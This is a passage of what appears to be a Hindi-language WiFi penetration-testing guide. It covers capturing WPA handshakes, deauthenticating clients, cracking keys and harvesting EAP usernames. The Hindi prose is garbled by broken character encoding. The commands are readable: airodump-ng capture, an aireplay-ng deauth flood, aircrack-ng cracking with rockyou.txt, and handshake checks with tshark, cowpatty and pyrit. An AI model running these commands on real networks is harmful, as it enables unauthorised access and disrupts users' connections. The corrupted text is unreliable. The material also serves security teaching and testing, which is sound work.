  2. рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЪреИрдирд▓ рдФрд░ BSSID рдкрд░ рдиреЗрдЯрд╡рд░реНрдХ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреА рдирд┐рдЧрд░рд╛рдиреА рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП airodump-ng рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ, рдЙрдореНрдореАрдж рд╣реИ рдХрд┐ рдПрдХ рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рд╣реЛ рд╕рдХреЗред рдХрдорд╛рдВрдб рдЗрд╕ рддрд░рд╣ рджрд┐рдЦреЗрдЧрд╛:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  1. рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рдореМрдХреЗ рдХреЛ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛ рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рдЕрд╕реНрдерд╛рдпреА рд░реВрдк рд╕реЗ рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ рдХрд░реЗрдВ рддрд╛рдХрд┐ рдкреБрдирдГ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЛ рдордЬрдмреВрд░ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗред рдпрд╣ aireplay-ng рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рдЬреЛ рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛ рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдкреИрдХреЗрдЯ рднреЗрдЬрддрд╛ рд╣реИ:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдЬрдм рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛ рдбрд┐рдСрдереЗрдВрдЯрд┐рдХреЗрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛, рддреЛ рдпрд╣ рдХрд┐рд╕реА рдЕрдиреНрдп AP рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдпрд╛, рдЕрдиреНрдп рдорд╛рдорд▓реЛрдВ рдореЗрдВ, рдХрд┐рд╕реА рдЕрдиреНрдп рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗред

рдЬрдм airodump-ng рдореЗрдВ рдХреБрдЫ рд╣реИрдВрдбрд╢реЗрдХ рдЬрд╛рдирдХрд╛рд░реА рджрд┐рдЦрд╛рдИ рджреЗрддреА рд╣реИ, рддреЛ рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ рдФрд░ рдЖрдк рд╕реБрдирдирд╛ рдмрдВрдж рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

рдПрдХ рдмрд╛рд░ рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рд╣реЛ рдЬрд╛рдиреЗ рдХреЗ рдмрд╛рдж, рдЖрдк рдЗрд╕реЗ aircrack-ng рдХреЗ рд╕рд╛рде рдХреНрд░реИрдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд╣реИрдВрдбрд╢реЗрдХ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

рдпрджрд┐ рдпрд╣ рдЙрдкрдХрд░рдг рдХрд┐рд╕реА ESSID рдХрд╛ рдЕрдзреВрд░рд╛ рд╣реИрдВрдбрд╢реЗрдХ рдкреВрд░реНрдг рд╣реИрдВрдбрд╢реЗрдХ рд╕реЗ рдкрд╣рд▓реЗ рдкрд╛рддрд╛ рд╣реИ, рддреЛ рдпрд╣ рдорд╛рдиреНрдп рд╣реИрдВрдбрд╢реЗрдХ рдХрд╛ рдкрддрд╛ рдирд╣реАрдВ рд▓рдЧрд╛рдПрдЧрд╛ред

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

рдПрдВрдЯрд░рдкреНрд░рд╛рдЗрдЬ рд╡рд╛рдИрдлрд╛рдИ рд╕реЗрдЯрдЕрдк рдореЗрдВ, рдЖрдк рд╡рд┐рднрд┐рдиреНрди рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐рдпреЛрдВ рдХрд╛ рд╕рд╛рдордирд╛ рдХрд░реЗрдВрдЧреЗ, рдкреНрд░рддреНрдпреЗрдХ рд╡рд┐рднрд┐рдиреНрди рд╕реБрд░рдХреНрд╖рд╛ рд╕реНрддрд░реЛрдВ рдФрд░ рдкреНрд░рдмрдВрдзрди рд╕реБрд╡рд┐рдзрд╛рдУрдВ рдХреЛ рдкреНрд░рджрд╛рди рдХрд░рддреА рд╣реИред рдЬрдм рдЖрдк рдиреЗрдЯрд╡рд░реНрдХ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХрд╛ рдирд┐рд░реАрдХреНрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП airodump-ng рдЬреИрд╕реЗ рдЙрдкрдХрд░рдгреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдЖрдк рдЗрди рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдкреНрд░рдХрд╛рд░реЛрдВ рдХреЗ рд▓рд┐рдП рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред рдХреБрдЫ рд╕рд╛рдорд╛рдиреНрдп рд╡рд┐рдзрд┐рдпреЛрдВ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
  1. EAP-GTC (Generic Token Card):

  • рдпрд╣ рд╡рд┐рдзрд┐ рд╣рд╛рд░реНрдбрд╡реЗрдпрд░ рдЯреЛрдХрди рдФрд░ EAP-PEAP рдХреЗ рднреАрддрд░ рдПрдХ-рдмрд╛рд░ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рд╕рдорд░реНрдерди рдХрд░рддреА рд╣реИред MSCHAPv2 рдХреЗ рд╡рд┐рдкрд░реАрдд, рдпрд╣ рдПрдХ рдкреАрдпрд░ рдЪреБрдиреМрддреА рдХрд╛ рдЙрдкрдпреЛрдЧ рдирд╣реАрдВ рдХрд░рддреА рд╣реИ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ рдкрд░ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рдореЗрдВ рднреЗрдЬрддреА рд╣реИ, рдЬреЛ рдбрд╛рдЙрдирдЧреНрд░реЗрдб рд╣рдорд▓реЛрдВ рдХреЗ рд▓рд┐рдП рдЬреЛрдЦрд┐рдо рдкреИрджрд╛ рдХрд░рддреА рд╣реИред

  1. EAP-MD5 (Message Digest 5):

  • рдЗрд╕рдореЗрдВ рдХреНрд▓рд╛рдЗрдВрдЯ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ MD5 рд╣реИрд╢ рднреЗрдЬрдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИред рдпрд╣ рд╕рд┐рдлрд╛рд░рд┐рд╢ рдирд╣реАрдВ рдХреА рдЬрд╛рддреА рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рд╢рдмреНрджрдХреЛрд╢ рд╣рдорд▓реЛрдВ рдХреЗ рдкреНрд░рддрд┐ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реИ, рд╕рд░реНрд╡рд░ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреА рдХрдореА рд╣реИ, рдФрд░ рд╕рддреНрд░-рд╡рд┐рд╢рд┐рд╖реНрдЯ WEP рдХреБрдВрдЬреА рдЙрддреНрдкрдиреНрди рдХрд░рдиреЗ рдореЗрдВ рдЕрд╕рдорд░реНрде рд╣реИред

  1. EAP-TLS (Transport Layer Security):

  • рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЗ рд▓рд┐рдП рдХреНрд▓рд╛рдЗрдВрдЯ-рд╕рд╛рдЗрдб рдФрд░ рд╕рд░реНрд╡рд░-рд╕рд╛рдЗрдб рдкреНрд░рдорд╛рдгрдкрддреНрд░реЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ рдФрд░ рд╕рдВрдЪрд╛рд░ рдХреЛ рд╕реБрд░рдХреНрд╖рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдЖрдзрд╛рд░рд┐рдд рдФрд░ рд╕рддреНрд░-рдЖрдзрд╛рд░рд┐рдд WEP рдХреБрдВрдЬреА рдЧрддрд┐рд╢реАрд▓ рд░реВрдк рд╕реЗ рдЙрддреНрдкрдиреНрди рдХрд░ рд╕рдХрддрд╛ рд╣реИред

  1. EAP-TTLS (Tunneled Transport Layer Security):

  • рдПрдХ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдЯрдирд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЖрдкрд╕реА рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ, рд╕рд╛рде рд╣реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рд╡рд┐рд╢рд┐рд╖реНрдЯ, рд╕рддреНрд░-рд╡рд┐рд╢рд┐рд╖реНрдЯ WEP рдХреБрдВрдЬреА рдирд┐рдХрд╛рд▓рдиреЗ рдХреА рд╡рд┐рдзрд┐ рднреАред рдпрд╣ рдХреЗрд╡рд▓ рд╕рд░реНрд╡рд░-рд╕рд╛рдЗрдб рдкреНрд░рдорд╛рдгрдкрддреНрд░реЛрдВ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдХреНрд▓рд╛рдЗрдВрдЯ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред

  1. PEAP (Protected Extensible Authentication Protocol):

  • рдпрд╣ EAP рдХреЗ рд╕рдорд╛рди рдХрд╛рд░реНрдп рдХрд░рддрд╛ рд╣реИ, рд╕реБрд░рдХреНрд╖рд┐рдд рд╕рдВрдЪрд╛рд░ рдХреЗ рд▓рд┐рдП рдПрдХ TLS рдЯрдирд▓ рдмрдирд╛рддрд╛ рд╣реИред рдпрд╣ рдЯрдирд▓ рджреНрд╡рд╛рд░рд╛ рдкреНрд░рджрд╛рди рдХреА рдЧрдИ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдХрд╛рд░рдг EAP рдХреЗ рд╢реАрд░реНрд╖ рдкрд░ рдХрдордЬреЛрд░ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рдЙрдкрдпреЛрдЧ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред

  • PEAP-MSCHAPv2: рдЗрд╕реЗ рдЕрдХреНрд╕рд░ PEAP рдХреЗ рд░реВрдк рдореЗрдВ рд╕рдВрджрд░реНрднрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдпрд╣ рдХрдордЬреЛрд░ MSCHAPv2 рдЪреБрдиреМрддреА/рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рддрдВрддреНрд░ рдХреЛ рдПрдХ рд╕реБрд░рдХреНрд╖рд╛рддреНрдордХ TLS рдЯрдирд▓ рдХреЗ рд╕рд╛рде рдЬреЛрдбрд╝рддрд╛ рд╣реИред

  • PEAP-EAP-TLS (рдпрд╛ PEAP-TLS): EAP-TLS рдХреЗ рд╕рдорд╛рди рд╣реИ рд▓реЗрдХрд┐рди рдкреНрд░рдорд╛рдгрдкрддреНрд░реЛрдВ рдХрд╛ рдЖрджрд╛рди-рдкреНрд░рджрд╛рди рдХрд░рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдПрдХ TLS рдЯрдирд▓ рд╢реБрд░реВ рдХрд░рддрд╛ рд╣реИ, рдЬреЛ рд╕реБрд░рдХреНрд╖рд╛ рдХреА рдПрдХ рдЕрддрд┐рд░рд┐рдХреНрдд рдкрд░рдд рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред

рдЖрдк рдЗрди рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдпрд╣рд╛рдВ рдФрд░ рдпрд╣рд╛рдВ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВред

Username Capture

https://tools.ietf.org/html/rfc3748#page-27 рдХреЛ рдкрдврд╝рдиреЗ рдкрд░ рдРрд╕рд╛ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдпрджрд┐ рдЖрдк EAP рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд░рд╣реЗ рд╣реИрдВ рддреЛ "Identity" messages рдХрд╛ рд╕рдорд░реНрдерди рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП, рдФрд░ username "Response Identity" рд╕рдВрджреЗрд╢реЛрдВ рдореЗрдВ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рднреЗрдЬрд╛ рдЬрд╛рдПрдЧрд╛ред

рдпрд╣рд╛рдВ рддрдХ рдХрд┐ рд╕рдмрд╕реЗ рд╕реБрд░рдХреНрд╖рд┐рдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐рдпреЛрдВ рдореЗрдВ рд╕реЗ рдПрдХ: PEAP-EAP-TLS рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╕рдордп рднреА, EAP рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдореЗрдВ рднреЗрдЬреЗ рдЧрдП username рдХреЛ рдХреИрдкреНрдЪрд░ рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реИред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдПрдХ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╕рдВрдЪрд╛рд░ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВ (рдПрдХ рдЪреИрдирд▓ рдХреЗ рднреАрддрд░ airodump-ng рд╢реБрд░реВ рдХрд░реЗрдВ рдФрд░ рдЙрд╕реА рдЗрдВрдЯрд░рдлреЗрд╕ рдореЗрдВ wireshark) рдФрд░ рдкреИрдХреЗрдЯ рдХреЛ eapol рджреНрд╡рд╛рд░рд╛ рдлрд╝рд┐рд▓реНрдЯрд░ рдХрд░реЗрдВред "Response, Identity" рдкреИрдХреЗрдЯ рдХреЗ рднреАрддрд░, рдХреНрд▓рд╛рдЗрдВрдЯ рдХрд╛ username рджрд┐рдЦрд╛рдИ рджреЗрдЧрд╛ред

Anonymous Identities

рдкрд╣рдЪрд╛рди рдЫрд┐рдкрд╛рдирд╛ EAP-PEAP рдФрд░ EAP-TTLS рджреЛрдиреЛрдВ рджреНрд╡рд╛рд░рд╛ рд╕рдорд░реНрдерд┐рдд рд╣реИред WiFi рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рд╕рдВрджрд░реНрдн рдореЗрдВ, EAP-Identity рдЕрдиреБрд░реЛрдз рдЖрдорддреМрд░ рдкрд░ рдПрд╕реЛрд╕рд┐рдПрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рджреМрд░рд╛рди рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ (AP) рджреНрд╡рд╛рд░рд╛ рд╢реБрд░реВ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдЧреБрдордирд╛рдореА рдХреА рд╕реБрд░рдХреНрд╖рд╛ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдбрд┐рд╡рд╛рдЗрд╕ рдкрд░ EAP рдХреНрд▓рд╛рдЗрдВрдЯ рд╕реЗ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдХреЗрд╡рд▓ рдкреНрд░рд╛рд░рдВрднрд┐рдХ RADIUS рд╕рд░реНрд╡рд░ рджреНрд╡рд╛рд░рд╛ рдЕрдиреБрд░реЛрдз рдХреЛ рд╕рдВрд╕рд╛рдзрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рдЬрд╛рдирдХрд╛рд░реА рд╣реЛрддреА рд╣реИред рдЗрд╕ рдЕрд╡рдзрд╛рд░рдгрд╛ рдХреЛ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкрд░рд┐рджреГрд╢реНрдпреЛрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рджрд░реНрд╢рд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ:

  • EAP-Identity = anonymous

  • рдЗрд╕ рдкрд░рд┐рджреГрд╢реНрдп рдореЗрдВ, рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдкрдиреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдЙрдкрдирд╛рдо "anonymous" рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред рдкреНрд░рд╛рд░рдВрднрд┐рдХ RADIUS рд╕рд░реНрд╡рд░ рдпрд╛ рддреЛ EAP-PEAP рдпрд╛ EAP-TTLS рд╕рд░реНрд╡рд░ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рд░реНрдп рдХрд░рддрд╛ рд╣реИ, рдЬреЛ PEAP рдпрд╛ TTLS рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рд╕рд░реНрд╡рд░-рд╕рд╛рдЗрдб рдХрд╛ рдкреНрд░рдмрдВрдзрди рдХрд░рддрд╛ рд╣реИред рдЖрдВрддрд░рд┐рдХ (рд╕реБрд░рдХреНрд╖рд┐рдд) рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐ рдлрд┐рд░ рдпрд╛ рддреЛ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ рд╕рдВрднрд╛рд▓реА рдЬрд╛рддреА рд╣реИ рдпрд╛ рдПрдХ рджреВрд░рд╕реНрде (рд╣реЛрдо) RADIUS рд╕рд░реНрд╡рд░ рдХреЛ рд╕реМрдВрдк рджреА рдЬрд╛рддреА рд╣реИред

  • EAP-Identity = anonymous@realm_x

  • рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ, рд╡рд┐рднрд┐рдиреНрди рдХреНрд╖реЗрддреНрд░реЛрдВ рдХреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдкрдиреА рдкрд╣рдЪрд╛рди рдЫрд┐рдкрд╛рддреЗ рд╣реИрдВ рдЬрдмрдХрд┐ рдЕрдкрдиреЗ рд╕рдВрдмрдВрдзрд┐рдд рдХреНрд╖реЗрддреНрд░реЛрдВ рдХрд╛ рд╕рдВрдХреЗрдд рджреЗрддреЗ рд╣реИрдВред рдпрд╣ рдкреНрд░рд╛рд░рдВрднрд┐рдХ RADIUS рд╕рд░реНрд╡рд░ рдХреЛ EAP-PEAP рдпрд╛ EAP-TTLS рдЕрдиреБрд░реЛрдзреЛрдВ рдХреЛ рдЙрдирдХреЗ рд╣реЛрдо рдХреНрд╖реЗрддреНрд░реЛрдВ рдореЗрдВ RADIUS рд╕рд░реНрд╡рд░реЛрдВ рдХреЛ рдкреНрд░реЙрдХреНрд╕реА рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЬреЛ PEAP рдпрд╛ TTLS рд╕рд░реНрд╡рд░ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рд░реНрдп рдХрд░рддреЗ рд╣реИрдВред рдкреНрд░рд╛рд░рдВрднрд┐рдХ RADIUS рд╕рд░реНрд╡рд░ рдХреЗрд╡рд▓ рдПрдХ RADIUS рд░рд┐рд▓реЗ рдиреЛрдб рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рд░реНрдп рдХрд░рддрд╛ рд╣реИред

  • рд╡реИрдХрд▓реНрдкрд┐рдХ рд░реВрдк рд╕реЗ, рдкреНрд░рд╛рд░рдВрднрд┐рдХ RADIUS рд╕рд░реНрд╡рд░ EAP-PEAP рдпрд╛ EAP-TTLS рд╕рд░реНрд╡рд░ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рд░реНрдп рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдпрд╛ рддреЛ рд╕реБрд░рдХреНрд╖рд┐рдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐ рдХреЛ рд╕рдВрднрд╛рд▓ рд╕рдХрддрд╛ рд╣реИ рдпрд╛ рдЗрд╕реЗ рдХрд┐рд╕реА рдЕрдиреНрдп рд╕рд░реНрд╡рд░ рдХреЛ рдЕрдЧреНрд░реЗрд╖рд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдпрд╣ рд╡рд┐рдХрд▓реНрдк рд╡рд┐рднрд┐рдиреНрди рдХреНрд╖реЗрддреНрд░реЛрдВ рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢рд┐рд╖реНрдЯ рдиреАрддрд┐рдпреЛрдВ рдХреА рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рд╕реБрд╡рд┐рдзрд╛ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред

EAP-PEAP рдореЗрдВ, рдПрдХ рдмрд╛рд░ рдЬрдм PEAP рд╕рд░реНрд╡рд░ рдФрд░ PEAP рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЗ рдмреАрдЪ TLS рдЯрдирд▓ рд╕реНрдерд╛рдкрд┐рдд рд╣реЛ рдЬрд╛рддреА рд╣реИ, рддреЛ PEAP рд╕рд░реНрд╡рд░ рдПрдХ EAP-Identity рдЕрдиреБрд░реЛрдз рд╢реБрд░реВ рдХрд░рддрд╛ рд╣реИ рдФрд░ рдЗрд╕реЗ TLS рдЯрдирд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рднреЗрдЬрддрд╛ рд╣реИред рдХреНрд▓рд╛рдЗрдВрдЯ рдЗрд╕ рджреВрд╕рд░реЗ EAP-Identity рдЕрдиреБрд░реЛрдз рдХрд╛ рдЙрддреНрддрд░ EAP-Identity рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рднреЗрдЬрдХрд░ рджреЗрддрд╛ рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдкрд╣рдЪрд╛рди рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдЯрдирд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣реЛрддреА рд╣реИред рдпрд╣ рджреГрд╖реНрдЯрд┐рдХреЛрдг 802.11 рдЯреНрд░реИрдлрд╝рд┐рдХ рдкрд░ рдХрд┐рд╕реА рднреА рд╡реНрдпрдХреНрддрд┐ рдХреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдкрд╣рдЪрд╛рди рдкреНрд░рдХрдЯ рдХрд░рдиреЗ рд╕реЗ рдкреНрд░рднрд╛рд╡реА рд░реВрдк рд╕реЗ рд░реЛрдХрддрд╛ рд╣реИред

EAP-TTLS рдПрдХ рдереЛрдбрд╝реА рдЕрд▓рдЧ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд╛ рдкрд╛рд▓рди рдХрд░рддрд╛ рд╣реИред EAP-TTLS рдХреЗ рд╕рд╛рде, рдХреНрд▓рд╛рдЗрдВрдЯ рдЖрдорддреМрд░ рдкрд░ PAP рдпрд╛ CHAP рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХрд░рддрд╛ рд╣реИ, рдЬреЛ TLS рдЯрдирд▓ рджреНрд╡рд╛рд░рд╛ рд╕реБрд░рдХреНрд╖рд┐рдд рд╣реЛрддрд╛ рд╣реИред рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ, рдХреНрд▓рд╛рдЗрдВрдЯ рдкреНрд░рд╛рд░рдВрднрд┐рдХ TLS рд╕рдВрджреЗрд╢ рдореЗрдВ рдПрдХ User-Name рд╡рд┐рд╢реЗрд╖рддрд╛ рдФрд░ рдпрд╛ рддреЛ рдПрдХ Password рдпрд╛ CHAP-Password рд╡рд┐рд╢реЗрд╖рддрд╛ рд╢рд╛рдорд┐рд▓ рдХрд░рддрд╛ рд╣реИ рдЬреЛ рдЯрдирд▓ рд╕реНрдерд╛рдкрдирд╛ рдХреЗ рдмрд╛рдж рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИред

рдЪрд╛рд╣реЗ рдХреЛрдИ рднреА рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдЪреБрдирд╛ рдЬрд╛рдП, PEAP/TTLS рд╕рд░реНрд╡рд░ TLS рдЯрдирд▓ рд╕реНрдерд╛рдкрд┐рдд рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдкрд╣рдЪрд╛рди рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИред рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдкрд╣рдЪрд╛рди рдХреЛ user@realm рдпрд╛ рдХреЗрд╡рд▓ user рдХреЗ рд░реВрдк рдореЗрдВ рджрд░реНрд╢рд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдпрджрд┐ PEAP/TTLS рд╕рд░реНрд╡рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рднреА рдЬрд┐рдореНрдореЗрджрд╛рд░ рд╣реИ, рддреЛ рдЕрдм рдпрд╣ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдкрд╣рдЪрд╛рди рд░рдЦрддрд╛ рд╣реИ рдФрд░ TLS рдЯрдирд▓ рджреНрд╡рд╛рд░рд╛ рд╕реБрд░рдХреНрд╖рд┐рдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐ рдХреЗ рд╕рд╛рде рдЖрдЧреЗ рдмрдврд╝рддрд╛ рд╣реИред рд╡реИрдХрд▓реНрдкрд┐рдХ рд░реВрдк рд╕реЗ, PEAP/TTLS рд╕рд░реНрд╡рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╣реЛрдо RADIUS рд╕рд░реНрд╡рд░ рдХреЛ рдПрдХ рдирдпрд╛ RADIUS рдЕрдиреБрд░реЛрдз рдЕрдЧреНрд░реЗрд╖рд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдпрд╣ рдирдпрд╛ RADIUS рдЕрдиреБрд░реЛрдз PEAP рдпрд╛ TTLS рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдкрд░рдд рдХреЛ рдЫреЛрдбрд╝ рджреЗрддрд╛ рд╣реИред рдЬрд╣рд╛рдВ 